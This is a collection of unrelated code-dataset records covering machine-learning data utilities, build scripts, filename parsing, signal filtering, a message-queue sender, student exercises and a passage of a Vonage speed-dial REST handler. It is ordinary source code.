stored.\n vocabulary_size: size of the vocabulary to create and use if no vocabulary file found in rawdata. Otherwise, use supplied vocabulary file.\n task_type: different task_type has slightly different rawdata format, and need different treatment\n for classification task, usually has TrainPairs, EvalPairs, targetSpaceID file\n for search task,\n for cross-lingual search tasks,\n for question answer tasks,\n max_seq_length: max number of tokens of a single source/target sequence\n Returns:\n A tuple of 5 elements:\n (1) path to encoded TrainPairs: targetID, Sequence of source token IDs\n (2) path to encoded EvalPairs: targetID, Sequence of source token IDs\n (3) path to encoded full TargetSpaces: targetID, Sequence of target token IDs\n (4) path to the source vocabulary file,\n (5) path to the target vocabulary file.\n \"\"\"\n # extract corpus to the specified processed directory.\n get_data_set(raw_data_dir, processed_data_dir)\n\n # generate vocab file if not available, otherwise, use supplied vocab file for encoder\n vocabFile = processed_data_dir + '/vocabulary.txt'\n if gfile.Exists( vocabFile ):\n print(\"Loading supplied vocabluary file: %s\" % vocabFile )\n encoder = text_encoder.SubwordTextEncoder(filename=vocabFile)\n print(\"Total vocab size is: %d\" % encoder.vocab_size )\n else:\n print(\"No supplied vocabulary file found. Build new vocabulary based on training data ....\")\n token_counts = tokenizer.corpus_token_counts( processed_data_dir + '/*.Corpus', 1000000, split_on_newlines=True)\n encoder = text_encoder.SubwordTextEncoder.build_to_target_size( vocabulary_size, token_counts, 2, 1000 )\n encoder.store_to_file(vocabFile)\n print(\"New vocabulary constructed.\")\n\n # create training corpus and evaluation corpus per task_type\n if task_type.lower().strip() == \"classification\":\n train_corpus, dev_corpus, encodedTgtSpace, tgtIdNameMap = get_classification_corpus( processed_data_dir, encoder, max_seq_length)\n elif task_type.lower().strip() in [\"ranking\", \"crosslingual\" ]:\n train_corpus, dev_corpus, encodedTgtSpace, tgtIdNameMap = get_search_corpus( processed_data_dir, encoder, max_seq_length)\n elif task_type.lower().strip() == \"qna\":\n train_corpus, dev_corpus, encodedTgtSpace, tgtIdNameMap = get_questionAnswer_corpus(processed_data_dir, encoder, max_seq_length)\n else:\n raise ValueError(\"Unsupported task_type. Please use one of: classification, search, crosslanguages, questionanswer\")\n\n return encoder, train_corpus, dev_corpus, encodedTgtSpace, tgtIdNameMap\n\n\n\n\ndef load_encodedTargetSpace(processed_data_dir):\n \"\"\"\n\n :param processed_data_dir:\n :return:\n \"\"\"\n vocabFile = processed_data_dir + '/vocabulary.txt'\n if gfile.Exists( vocabFile ):\n encoder = text_encoder.SubwordTextEncoder(filename=vocabFile)\n print(\"Loaded vocab size is: %d\" % encoder.vocab_size )\n else:\n raise ValueError(\"Error!! Could not found vaculary file in model folder.\")\n encodedTgtSpace = {}\n tgtID_Name_Map = {}\n tgtEncodeFile = os.path.join(processed_data_dir, \"encoded.FullTargetSpace\")\n if not gfile.Exists(tgtEncodeFile):\n raise ValueError(\"Error! could not found encoded.FullTargetSpace in model folder.\")\n print(\"Loading full target space index ...\")\n for line in codecs.open( tgtEncodeFile, 'r', 'utf-8'):\n tgtId, tgtName, tgtEncoding = line.strip().split('\\t')\n tgtID_Name_Map[tgtId] = tgtName\n encodedTgtSpace[tgtId] = [ int(i) for i in tgtEncoding.split(',') ]\n return encoder, encodedTgtSpace, tgtID_Name_Map\n\n\n\ndef save_model_configs(processed_data_dir, configs):\n max_seq_length, max_gradient_norm, vocabsize, embedding_size, \\\n encoding_size, src_cell_size, tgt_cell_size, num_layers, \\\n learning_rate, learning_rate_decay_factor, targetSpaceSize, network_mode, TOP_N = configs\n outfile = codecs.open( os.path.join(processed_data_dir,'modelConfig.param'), 'w', 'utf-8')\n outfile.write( 'max_seq_length=' + str(max_seq_length) + '\\n')\n outfile.write( 'max_gradient_norm=' + str(max_gradient_norm) + '\\n')\n outfile.write( 'vocabsize=' + str(vocabsize) + '\\n')\n outfile.write( 'embedding_size=' + str(embedding_size) + '\\n')\n outfile.write( 'encoding_size=' + str(encoding_size) + '\\n')\n outfile.write( 'src_cell_size=' + str(src_cell_size) + '\\n')\n outfile.write( 'tgt_cell_size=' + str(tgt_cell_size) + '\\n')\n outfile.write( 'num_layers=' + str(num_layers) + '\\n')\n outfile.write( 'learning_rate=' + str(learning_rate) + '\\n')\n outfile.write( 'learning_rate_decay_factor=' + str(learning_rate_decay_factor) + '\\n')\n outfile.write( 'targetSpaceSize=' + str(targetSpaceSize) + '\\n')\n outfile.write( 'network_mode=' + str(network_mode) + '\\n')\n outfile.write( 'TOP_N=' + str(TOP_N) + '\\n')\n outfile.close()\n return\n\n\ndef load_model_configs(processed_data_dir):\n modelConfig={}\n for line in open(processed_data_dir + '/modelConfig.param', 'rt'):\n if '=' not in line.strip():\n continue\n key, value = line.strip().split('=')\n modelConfig[key]=value\n return modelConfig\n\ndef getSortedResults(scores):\n rankedIdx = np.argsort( -scores )\n sortedScore = -np.sort( -scores, axis=1 )\n print('Sample top5 scores:' , sortedScore[0:5])\n return sortedScore, rankedIdx\n\ndef computeTopK_accuracy( topk, labels, results ):\n k = min(topk, results.shape[1])\n nbrCorrect=0.0\n for i in xrange(results.shape[0]):\n if labels[i] in results[i][:k]:\n nbrCorrect += 1.0\n return nbrCorrect / float(results.shape[0])\n\n","sub_path":"data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":15482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"116920276","text":"import os\nPathJoin = os.path.join\n\ntgtroot = 'tsload-mbench'\ntarget = 'nodemem'\n\nImport('env')\n\nmod = env.Clone()\n\nmod.Append(LIBS = ['numa'])\nmod.Append(CCFLAGS = ['-O2'])\n\nmodule = mod.Module('load', target)\n\nexperiment_json = File('experiment.json')\n\nmod.Depends(module, [experiment_json])\n\ninstall_path = PathJoin(mod['INSTALL_VAR'], 'mbench', target)\nmod.InstallTarget(tgtroot, install_path, experiment_json)","sub_path":"nodemem/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"494826179","text":"# -*- coding: utf-8 -*-\nimport re\nimport unicodedata\n\n__author__ = 'Matthieu Gallet'\n\n\nclass XmlParser(object):\n duration_hmn = re.compile(r'^(\\d+)h (\\d+)mn$')\n duration_hmns = re.compile(r'^(\\d+)h (\\d+)mn (\\d+)s$')\n duration_mn = re.compile(r'^(\\d+)mn$')\n duration_mns = re.compile(r'^(\\d+)mn (\\d+)s$')\n bitrate_bps = re.compile(r'^([0-9\\.\\s]*) (mbps|bps|kbps)$')\n size = re.compile(r'^([0-9\\.\\s]*) (KiB|MiB|GiB) \\(\\d+\\.?\\d*%\\)$')\n\n @staticmethod\n def get_xml_tag(track, name):\n l = track.getElementsByTagName(name)\n if len(l) == 0:\n return None\n return l[0].firstChild.data\n\n @staticmethod\n def get_xml_duration(track, name):\n value = XmlParser.get_xml_tag(track, name)\n if not value:\n return None\n t = XmlParser.duration_hmns.match(value)\n if t:\n return 3600 * int(t.group(1)) + 60 * int(t.group(2)) + int(t.group(3))\n t = XmlParser.duration_hmn.match(value)\n if t:\n return 3600 * int(t.group(1)) + 60 * int(t.group(2))\n t = XmlParser.duration_mn.match(value)\n if t:\n return 60 * int(t.group(1))\n t = XmlParser.duration_mns.match(value)\n if t:\n return 60 * int(t.group(1)) + int(t.group(2))\n return None\n\n @staticmethod\n def get_xml_dimension(track, name, unit=''):\n value = XmlParser.get_xml_tag(track, name)\n if not value:\n return None\n unit = unit.lower()\n value = value.lower()\n t = re.match('^([0-9\\.\\s]*)\\s?{0}$'.format(unit), value)\n if t:\n return float(t.group(1).replace(' ', ''))\n t = re.match('^([0-9\\.\\s]*):([0-9\\.\\s]*)\\s?{0}$'.format(unit), value)\n if t:\n return float(t.group(1).replace(' ', '')) / float(t.group(2).replace(' ', ''))\n return None\n\n @staticmethod\n def get_xml_bit_rate(track, name):\n value = XmlParser.get_xml_tag(track, name)\n if not value:\n return None\n value = value.lower()\n t = XmlParser.bitrate_bps.match(value)\n if t:\n value = float(t.group(1).replace(' ', ''))\n if t.group(2) == 'kbps':\n value *= 1000.\n elif t.group(2) == 'mbps':\n value *= 1000. * 1000.\n return value\n return None\n\n @staticmethod\n def get_xml_size(track, name):\n value = XmlParser.get_xml_tag(track, name)\n if not value:\n return None\n t = XmlParser.size.match(value)\n if not t:\n return None\n s = float(t.group(1).replace(' ', '')) * 1024\n if t.group(2) == 'MiB':\n s *= 1024\n elif t.group(2) == 'GiB':\n s *= 1024 * 1024\n return s\n\n\nteam_tags_nocase = (\n '[', '1080p', '720p', '1080i', 'LIMITED', 'LiMiTED', 'TRUEFRENCH', 'DVDRiP', 'BRRiP', 'UNRATED', 'SUBFORCED',\n 'RERiP', 'BDRip', 'EXTENDED', 'REPACK', 'XViD',\n)\nteam_tags_case = ('FRENCH', )\nend_with_year = re.compile('.*\\s(19\\d{2}|2[0-3]\\d{2})$')\n\n\ndef clean_filename(name):\n name = unicodedata.normalize('NFKD', name)\n return re.sub(r'[!:/\\\\]', '-', name)\n\n\ndef clean_movie_filename(name):\n src_name = name\n name = name.replace('-', ' ').replace('.', ' ').replace('_', ' ')\n for tag in team_tags_nocase:\n t = name.lower().find(tag.lower())\n if t > 0:\n name = name[0:t]\n for tag in team_tags_case:\n t = name.find(tag)\n if t > 0:\n name = name[0:t]\n name = name.strip()\n if end_with_year.match(name):\n name = name[0:-4]\n return name or src_name\n\n\ndef guess_movie_infos(name):\n code = None\n languages = 'VF'\n volume = 1\n volume_count = 1\n name_l = name.lower()\n if name_l.find('cd1') > -1 or name_l.find('cd 1') > -1:\n volume_count = 2\n if name_l.find('cd2') > -1 or name_l.find('cd 2') > -1:\n volume = 2\n volume_count = 2\n if name_l.find(' fr ') > -1 or name_l.find('french') > -1:\n languages = 'VF'\n if name_l.find(' eng ') > -1 or name_l.find(' vo ') > -1:\n languages = 'VF VO'\n elif name_l.find('vost') > -1:\n languages = 'VF VOST'\n elif name_l.find(' eng ') > -1 or name_l.find(' vo ') > -1:\n languages = 'VO'\n elif name_l.find('vost') > -1:\n languages = 'VOST'\n if name_l.find(' sub ') > -1 or name_l.find(' st ') > -1:\n languages += 'ST'\n else:\n name = clean_movie_filename(name)\n return {'languages': languages, 'volume': volume, 'volume_count': volume_count, 'name': name, 'code': code, }\n","sub_path":"plexyglass/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"189202233","text":"# Jérôme Pacquet, paqj2905\n# Malcolm St. John, stjm2505\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy import signal\nfrom lib import zplane\n\n\nfe = 1600\nwp = 650\nws = 750\nwc = 32490.15\nx = 4 * fe**2\ny = 2**1.5 * fe\nzeroes = [-1, -1]\nden_coef = [1, -1.1939, 0.4359]\n\n\n# Afficher les poles et zeros sur le cercle complexe\ndef graph_poles_zeroes(zeroes, den_coef, function_name):\n zplane.zplane(np.poly(zeroes), den_coef, function_name)\n\n\n# Load the image into python from npy file\ndef load_img(img_name):\n img_load = np.load(img_name)\n plt.figure()\n plt.imshow(img_load, cmap='gray')\n plt.title('Image sans modifs')\n plt.show()\n return img_load\n\n\n# Afficher la reponse en freqences\ndef freqresponse(num, den, type):\n freq, response = signal.freqz(num, den)\n plt.figure()\n plt.plot(freq, 20*np.log10(np.absolute(response)))\n plt.title('Reponse en frequence de : ' + type)\n plt.xlabel('Frequence normalisee')\n plt.ylabel('Reponse')\n plt.show()\n\n\n# Appliquer les filtre bilineaire a l'image\ndef reponse_filtre_bilineaire(img_load):\n filterout = signal.lfilter(np.poly(zeroes), den_coef, img_load)\n plt.figure()\n plt.imshow(filterout, cmap='gray')\n plt.title('Image corrigee bilineaire')\n plt.show()\n freqresponse(np.poly(zeroes), den_coef, 'Bilineaire')\n return filterout\n\n\n# Appliquer le filtre de python sur l'image\ndef reponse_filtre_python(img_load, num, den):\n filterout = signal.lfilter(num, den, img_load)\n plt.figure()\n plt.imshow(filterout, cmap='gray')\n plt.title('Image debruiter python filter')\n plt.show()\n freqresponse(num, den, 'Python')\n return filterout\n\n\ndef debruiter_bilineaire(img):\n graph_poles_zeroes(zeroes, den_coef, 'bilineaire')\n return reponse_filtre_bilineaire(img)\n\n\ndef debruiter_python(img):\n ord, wn = signal.buttord(wp/(fe/2), ws/(fe/2), 0.5, 40)\n b, a = signal.butter(ord, wn)\n graph_poles_zeroes(b, a, 'python')\n return reponse_filtre_python(img, b, a)\n\n\nif __name__ == \"__main__\":\n print('Executing main')\n img = load_img('../images/goldhill_bruit.npy')\n debruiter_bilineaire(img)\n debruiter_python(img)\n","sub_path":"S5/app5/lib/debruiter.py","file_name":"debruiter.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"391947741","text":"# -*- coding: utf-8 -*-\nimport logging\n\nfrom datetime import datetime\nfrom pytz import utc as pytz_utc\n\nfrom alamo_scheduler.conf import settings\nfrom alamo_scheduler.drivers import DriverBase\nfrom alamo_scheduler.zero_mq import ZeroMQQueue\n\nlogger = logging.getLogger(__name__)\n\n\nclass DefaultSender(DriverBase):\n def __init__(self):\n self.queue = ZeroMQQueue(\n settings.ZERO_MQ_HOST,\n settings.ZERO_MQ_PORT\n )\n self.queue.connect()\n\n def send(self, check):\n \"\"\"Schedule check.\"\"\"\n logger.info(\n 'Check `%s:%s` scheduled.', check['uuid'], check['name']\n )\n\n check['scheduled_time'] = datetime.now(tz=pytz_utc).isoformat()\n self.queue.send(check)\n","sub_path":"alamo_scheduler/drivers/default/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"197752587","text":"import logging\n\nimport connexion\n\nfrom fm_url_checker.producer import settings\n\nlog = logging.getLogger(__name__)\n\n\ndef create_app():\n connexion_app = connexion.App(settings.NAME, specification_dir=\"fm_url_checker/producer/openapi/\")\n connexion_app.add_api(\n \"api.yaml\",\n # validate_responses=False,\n )\n\n return connexion_app\n\n\napp = create_app()\n\nif __name__ == '__main__':\n log.info(f\"Server starting on port: {settings.DEV_SERVER_PORT}\")\n app.run(port=settings.DEV_SERVER_PORT, debug=settings.DEBUG)\n","sub_path":"fm_url_checker/producer/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"651034925","text":"from com.scripts.script_01 import *\nimport HTMLTestRunner\n\n\nclass Suite(unittest.TestCase):\n \"\"\"HTML Report is working in Python 2, not in Python 3.\"\"\"\n\n def test_main(self):\n logging.info('Inside test suite')\n self.suite = unittest.defaultTestLoader.loadTestsFromTestCase(Script01_SignIn)\n\n outfile = open(Initilization.path+\"Report\\HTML_Report\\TestReport.html\", \"w\")\n runner = HTMLTestRunner.HTMLTestRunner(stream = outfile, title = 'Execution Report', description = 'Suite_02 Run')\n runner.run(self.suite)\n\n# import unittest\n# if __name__==\"__main__\":\n# HTMLTestRunner.main","sub_path":"com/suite_02.py","file_name":"suite_02.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"536697060","text":"from sys import stdin\nfrom LinkedQFile import LinkedQ\nfrom atomer import atomer\n\n#::= \n# ::= | \n# ::= | | () \n# ::= | \n#::= A | B | C | ... | Z\n#::= a | b | c | ... | z\n# ::= 2 | 3 | 4 | ...\n\ndef readFormel():\n \"\"\" readFormel \"\"\"\n readMol()\n\ndef readMol():\n \"\"\" readMol \"\"\"\n print(\"Readmol\")\n readGroup()\n if not q.isEmpty():\n readMol()\n \ndef readGroup():\n \"\"\" readGroup \"\"\"\n print(\"Readgroup\")\n if q.peek() == \"(\":\n q.get()\n readMol()\n if q.get() == \")\":\n readNum()\n return\n raise SyntaxFel(\"Saknar högerparentes.\")\n \n if not q.isEmpty():\n if q.peek() == \")\":\n return\n readAtom()\n if not q.isEmpty():\n readNum()\n \ndef readAtom():\n \"\"\" readAtom \"\"\"\n print(\"Readatom\")\n atomer = [\"H\",\"He\",\"Li\",\"Be\",\"B\",\"C\",\"N\",\"O\",\"F\",\"Ne\",\"Na\",\"Mg\",\"Al\",\"Si\",\"P\",\"S\",\"Cl\",\"K\",\"Ar\",\"Ca\",\"Sc\",\"Ti\",\"V\",\"Cr\",\"Mn\",\"Fe\",\"Ni\",\"Co\",\"Cu\",\"Zn\",\"Ga\",\"Ge\",\"As\",\"Se\",\"Br\",\"Kr\",\"Rb\",\"Sr\",\"Y\",\"Zr\",\"Nb\",\"Mo\",\"Tc\",\"Ru\",\"Rh\",\"Pd\",\"Ag\",\"Cd\",\"In\",\"Sn\",\"Sb\",\"I\",\"Te\",\"Xe\",\"Cs\",\"Ba\",\"La\",\"Ce\",\"Pr\",\"Nd\",\"Pm\",\"Sm\",\"Eu\",\"Gd\",\"Tb\",\"Dy\",\"Ho\",\"Er\",\"Tm\",\"Yb\",\"Lu\",\"Hf\",\"Ta\",\"W\",\"Re\",\"Os\",\"Ir\",\"Pt\",\"Au\",\"Hg\",\"Tl\",\"Pb\",\"Bi\",\"Po\",\"At\",\"Rn\",\"Fr\",\"Ra\",\"Ac\",\"Pa\",\"Th\",\"Np\",\"U\",\"Am\",\"Pu\",\"Cm\",\"Bk\",\"Cf\",\"Es\",\"Fm\",\"Md\",\"No\",\"Lr\",\"Rf\",\"Db\",\"Hs\",\"Sg\",\"Bh\",\"Mt\",\"Rg\",\"Ds\",\"Cn\"]\n upper = map(chr, range(ord(\"A\"), ord(\"Z\")))\n lower = map(chr, range(ord(\"a\"), ord(\"z\")))\n tmp = q.get()\n if not q.isEmpty() and q.peek() in lower:\n if tmp+q.peek() in atomer:\n q.get()\n return\n raise SyntaxFel(\"Okänd atom vid radslutet\")\n if tmp in atomer:\n return\n raise SyntaxFel(\"Okänd atom vid radslutet\")\n \ndef readNum():\n \"\"\" readNum \"\"\"\n print(\"Readnum\")\n num = q.get()\n if num.isdigit() and int(num) > 1:\n return True\n raise SyntaxFel(\"För litet tal vid radslutet\")\n\nclass SyntaxFel(Exception):\n def __init__(self, value):\n self.value = value\n def __str__(self):\n return repr(self.value)\n \n\nq = LinkedQ()\n\nstring = \"(H2O)3\"\nfor i in string:\n q.put(i)\n \ntry:\n readFormel()\n print(\"Följer syntax!\")\nexcept SyntaxFel as msg:\n print(msg,\"före\")\n while not q.isEmpty():\n print(q.get())\n\n#row = stdin.readline()\n#while row:\n# if row[0] != \"#\":\n# row = row.strip()\n# row = list(row)\n# for i in row:\n# q.put(i)\n# readFormel()\n# row = stdin.readline()","sub_path":"lab6/formelkoll_old.py","file_name":"formelkoll_old.py","file_ext":"py","file_size_in_byte":2627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"241102835","text":"i = 1\nwith open('files/quiz.txt') as file_in:\n lines = file_in.readlines()\n print(file_in.readlines())\nwith open('files/quiz_result2.txt') as file_out:\n print(file_out.write('Grade 2: Math Quiz.\\n'))\n # for l, equation in lines, start = 1:\n # try:\n # file_out.write(f'{i:1d}', ' = ___')\n # except EquationError:\n # print(\"Equation Error: 'str' and 'str\")\n # except MathError:\n # print(\"Math Error: Any number cannot divide by zero\")\n # except InvalidOperation:\n # print(\"Invalid Operation: must be +, -, * and / only\")\n\n # for l in lines:\n # if l not in '+-*/':\n \n # print(n)\n # file_out.write(f'{i:01d}, {Grade 2: Math Quiz.}')\n # file_out.write(f'{i:01d}., {n}')\n # i+=1","sub_path":"activities/file_quiz.py","file_name":"file_quiz.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"491435457","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nig = cv2.imread('./img/cameraman.tif',0)\ncv2.imshow('imagen',ig)\nh = cv2.calcHist([ig],[0],None,[256],[0,256])\n# normalizo el histograma\nh = h / h.sum()\nh = h.flatten()\nplt.bar(range(0,256),h)\nplt.show()\n# elijo el primer umbral a la mitad de la dinamica de grises\nT = 180\n# defino un error calculado entre el anterior umbral y el actual\ne = 3\ndif = 6\n\nwhile dif > e:\n x1 = np.array(range(1,T))\n h1 = h[1:T] / sum(h[1:T])\n m1 = np.sum(x1 * h1)\n \n x2 = np.array(range(T,len(h)-1))\n h2 = h[T:-1] / sum(h[T:-1])\n m2 = np.sum(x2 * h2)\n \n Tant = T\n \n T = np.int((m2 - m1) / 2)\n print('m2 ', T)\n \n dif = np.abs(T - Tant) \n\n\nplt.figure(2)\nplt.imshow(ig > T)\nplt.show()","sub_path":"Material/script_umbralVariable.py","file_name":"script_umbralVariable.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"222634428","text":"#!/usr/bin/env python\n#***************************************************************************/\n#*\n#* Copyright (c) 2007 Vonage Holdings Corp.\n#* All rights reserved.\n#*\n#*\n#***************************************************************************/\n#\n\n\"\"\"\nSpeed Dial\n==========\n\tThe Speed Dial service can be used to query contact manager\n\tto find the did associated with a Vonage username and\n\tthree digit speed dial code, as well as update or delete speed dial settings.\n\n\tOverview\n\t--------\n\t - B{Version}\n\t\t- 1.0.1\n\t - B{SVN Revision}\n\t\t- $Revision: 414357 $\n\t - B{Method}\n\t\t- HTTP GET\n\t\t- HTTP POST\n\t\t- HTTP DELETE\n\t - B{Required get parameters}\n\t\t- username\n\t - B{Optional get parameters}\n\t\t- speed_dial\n\t - B{Required post parameters}\n\t\t- username\n\t\t- speed_dial\n\t\t- telephone_number_id\n\t\t- modify_program\n\t - B{Required delete parameters}\n\t\t- username\n\t\t- speed_dial\n\t - B{Returns}\n\t\t- HTTP 200 - On success, with XML response body.\n\t\t- HTTP 403 - When an invalid speed dial setting is attempted to be set\n\t\t- HTTP 404 - When no speed dial setting is found for the speed dial code and username\n\t\t- HTTP 500 - Server error, exception information and stack trace\n\t\tin XML response body\n\t - B{Routes}\n\t\t- /dispatcher/speed_dial\n\t\t- /contact_manager/speed_dial\n\n\tExamples\n\t--------\n\t curl \"http://:8087/dispatcher/speed_dial?username=foo&speed_dial=100\"\n\n\t Returns::\n\t\t\n\t\t\n\t\t 18604638587\n\t\t\n\n\t curl \"http://:8087/dispatcher/speed_dial?username=foo&speed_dial=*74%20100\"\n\n\t Returns::\n\t\t\n\t\t\n\t\t 18604638587\n\t\t\n\n\t curl \"http://:8087/dispatcher/speed_dial?username=foo\"\n\n\t Returns::\n\t\t\n\t\t \n\t\t 173653\n\t\t 121\n\t\t 12015628830\n\t\t \n\t\t \n\t\t 173653\n\t\t 181\n\t\t 12015628830\n\t\t \n\t\t ...\n\t\t\n\n\t curl \"http://:8087/dispatcher/speed_dial?username=foo&speed_dial=111\"\n\n\t Returns::\n\t\t\n\t\t\n\t\t Speed Dial Not Found\n\t\t\n\n\t curl -X POST -d \"username=foo&speed_dial=411&telephone_number_id=11123\" \"http://:8087/dispatcher/speed_dial\"\n\t\n\t Returns::\n\t\t\n\t\t\n\t\t Invalid Speed Dial Value\n\t\t\n\n\t curl -X POST -d \"username=foo&speed_dial=101&telephone_number_id=5\" \"http://:8087/dispatcher/speed_dial\"\n\n\t Returns::\n\t\tHTTP/1.1 200 OK\t\n\n\t curl -X DELETE \"http://:8087/dispatcher/speed_dial?username=foo&speed_dial=101\"\n\n\t Returns::\n\t\tHTTP/1.1 200 OK\t\n\n\tHistory\n\t-------\n\t - Created: Nick Milkovits 02/05/2008\n\"\"\"\n\n\nfrom vonage.dispatcher.handler import Handler\nfrom vonage.util.vonxmlserializer import XMLSerializer\nfrom vonage.util.rest_utils import RestClientError\nimport contact_manager.phone_format as phone_format\n\nimport psycopg2\n\nDEFAULT_SERVICE_ENVELOPE_VERSION = 1.0\nSERVICE_ATTRIBUTES = {'name': 'speed_dial',\n\t'version': str(DEFAULT_SERVICE_ENVELOPE_VERSION),\n\t'revision': '$Revision: 414357 $'}\n\nclass ReturnObject(XMLSerializer):\n\t\"\"\"The object representation of the XML document\"\"\"\n\tdef __init__(self):\n\t\tself.speed_dial_number = None\n\t\tself.speed_dial_did = None\n\t\tself.contact_telephone_number_id = None\n\nclass SpeedDialSummary(XMLSerializer):\n\tdef __init__(self):\n\t\tself.speed_dial = []\n\nclass ErrorObject(XMLSerializer):\n\tdef __init__(self):\n\t\tself.error = None\n\nclass SpeedDialHandler(Handler):\n\t\"\"\"Encapsulates service request handling logic\"\"\"\n\tdef __init__(self):\n\n\t\tHandler.__init__(self, DEFAULT_SERVICE_ENVELOPE_VERSION)\n\t\tself.required_get_args = ['username']\n\t\tself.optional_get_args = ['speed_dial']\n\n\t\tself.required_post_args = ['speed_dial', 'username', 'telephone_number_id', 'modify_program']\n\t\tself.required_delete_args = ['speed_dial', 'username']\n\n\tdef get(self, http, req_dict):\n\n\t\tusername = req_dict['username']\n\t\tif req_dict['speed_dial'] is None:\n\t\t\tobj = self.get_summary(username)\n\t\t\t#######################\n\t\t\t### BEGIN DELETE ME ###\n\t\t\t#######################\n\t\t\tlegacy_obj = self.legacy_get_summary(username)\n\t\t\tobj = self.merge_results(obj, legacy_obj)\n\t\t\t#####################\n\t\t\t### END DELETE ME ###\n\t\t\t#####################\n\t\telse: \n\t\t\tspeed_dial = self.scrub_speed_dial(req_dict['speed_dial'])\n\t\t\tobj = self.query_speed_dial(username, speed_dial)\n\t\t\t#######################\n\t\t\t### BEGIN DELETE ME ###\n\t\t\t#######################\n\t\t\tif obj is None:\n\t\t\t\tobj = self.legacy_query_speed_dial(username, speed_dial)\n\t\t\t#####################\n\t\t\t### END DELETE ME ###\n\t\t\t#####################\n\t\t\tif obj is None:\n\t\t\t\thttp.status = 404\n\t\t\t\tobj = ErrorObject()\n\t\t\t\tobj.error = \"Speed Dial Not Found\"\n\n\t\treturn obj.dumps(SERVICE_ATTRIBUTES)\n\n\tdef post(self, http, req_dict, body_in):\n\t\tusername = req_dict['username']\n\t\tspeed_dial = req_dict['speed_dial'] # DO NOT SCRUB HERE\n\t\ttelephone_id = req_dict['telephone_number_id']\n\t\tmodify_program = req_dict['modify_program']\n\n\t\ttry:\n\t\t\tself.set_speed_dial(username, speed_dial, telephone_id, modify_program)\n\t\texcept psycopg2.IntegrityError:\n\t\t\thttp.status = 403\n\t\t\tobj = ErrorObject()\n\t\t\tobj.error = \"Invalid Speed Dial Value\"\n\t\t\treturn obj.dumps(SERVICE_ATTRIBUTES)\n\n\t\treturn None\n\n\tdef delete(self, http, req_dict):\n\t\tusername = req_dict['username']\n\t\tspeed_dial = req_dict['speed_dial'] # DO NOT SCRUB HERE\n\n\t\tself.unset_speed_dial(username, speed_dial)\n\t\treturn None\n\n\tdef set_speed_dial(self, username, speed_dial, telephone_number_id, modify_program):\n\t\texisting = self.query_speed_dial(username, speed_dial)\n\t\t#######################\n\t\t### BEGIN DELETE ME ###\n\t\t#######################\n\t\tif existing is None:\n\t\t\texisting = self.legacy_query_speed_dial(username, speed_dial)\n\t\t#####################\n\t\t### END DELETE ME ###\n\t\t#####################\n\n\t\tif not self.confirm_ownership(username, telephone_number_id):\n\t\t\traise RestClientError(\"Specified telephone_number_id does not belong to username\")\n\n\t\tif existing is None:\n\t\t\tself.insert_speed_dial(username, speed_dial, telephone_number_id, modify_program)\n\t\telse:\n\t\t\tself.update_speed_dial(username, speed_dial, telephone_number_id, modify_program)\n\n\tdef insert_speed_dial(self, username, speed_dial, telephone_number_id, modify_program):\n\t\tsql = \"\"\"\n\t\t\tinsert into speed_dials (contact_owner_id, speed_dial_number, contact_telephone_number_id, modify_program) \n\t\t\tselect id, %(speed_dial)s, %(tn_id)s, %(modify_program)s from contact_owners where lower(username) = %(username)s\n\t\t\"\"\"\n\t\tparams = {'username': username.lower(), 'speed_dial': speed_dial, 'tn_id': telephone_number_id, 'modify_program': modify_program}\n\t\tself.execute_query('contactmanager', sql, params)\n\n\tdef update_speed_dial(self, username, speed_dial, telephone_number_id, modify_program):\n\t\tif (speed_dial == \"\") or (speed_dial is None):\n\t\t unset_speed_dial(username,speed_dial)\n\t\t return\n\t\t\n\t\tsql = \"\"\"\n\t\t\tupdate speed_dials\n\t\t\tset contact_telephone_number_id = %(tn_id)s, modify_program = %(modify_program)s\n\t\t\tfrom contact_owners\n\t\t\twhere lower(contact_owners.username) = %(username)s\n\t\t\tand contact_owners.id = speed_dials.contact_owner_id\n\t\t\tand speed_dial_number = %(speed_dial)s\n\t\t\"\"\"\n\t\tparams = {'username': username.lower(), 'speed_dial': speed_dial, 'tn_id': telephone_number_id, 'modify_program': modify_program}\n\t\tself.execute_query('contactmanager', sql, params)\n\t\n\tdef confirm_ownership(self, username, telephone_number_id):\n\t\tsql = \"\"\"\n\t\t\tselect count(*) from contact_telephone_numbers ctn, contact_owners co, contacts c \n\t\t\twhere ctn.contact_id = c.id \n\t\t\tand c.contact_owner_id = co.id\n\t\t\tand lower(co.username) = %(username)s\n\t\t\tand ctn.id = %(telephone_id)s\n\t\t\"\"\"\n\n\t\tparams = {'username': username.lower(), 'telephone_id' : telephone_number_id }\n\t\tcurs = self.execute_query('contactmanager', sql, params)\n\t\trow = curs.fetchone()\n\t\treturn (row[0] != 0)\n\n\tdef unset_speed_dial(self, username, speed_dial):\n\t\tsql = \"\"\"\n\t\t\tdelete from speed_dials using contact_owners where contact_owners.username = %(username)s \n\t\t\tand contact_owners.id = speed_dials.contact_owner_id\n\t\t\tand speed_dials.speed_dial_number = %(speed_dial)s\n\t\t\"\"\"\n\t\tparams = {'username': username.lower(), 'speed_dial': 